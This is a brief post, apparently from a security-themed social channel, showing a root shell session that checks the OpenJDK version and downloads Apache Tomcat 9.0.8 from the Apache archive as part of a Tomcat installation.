2️⃣[root@keiv ~]# java -version
openjdk version "1.8.0_181"

> OpenJDK Runtime Environment (build 1.8.0_181-b13)
OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)

🦑tomcat deployment
Download tomcat

[root@keiv ~]# cd /usr/src/

[root@keiv src]# wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.8/bin/apache-tomcat-9.0.8.tar.gz



enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁